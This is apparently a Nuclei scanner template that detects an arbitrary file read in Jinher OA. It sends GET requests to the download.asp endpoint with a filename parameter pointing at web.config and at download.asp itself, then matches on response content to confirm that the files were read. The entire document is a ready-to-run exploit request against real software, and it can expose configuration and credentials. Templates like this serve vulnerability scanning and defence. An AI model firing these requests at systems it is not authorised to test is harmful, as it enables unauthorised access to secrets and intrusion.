id: Jinher-OA-fileRead

info:
  name: 金和OA任意文件读取漏洞
  author: str1am
  severity: high
  tags: Jinher,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config"
      - "{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Response.Buffer"
          - "identity impersonate"
        part: body
        condition: or
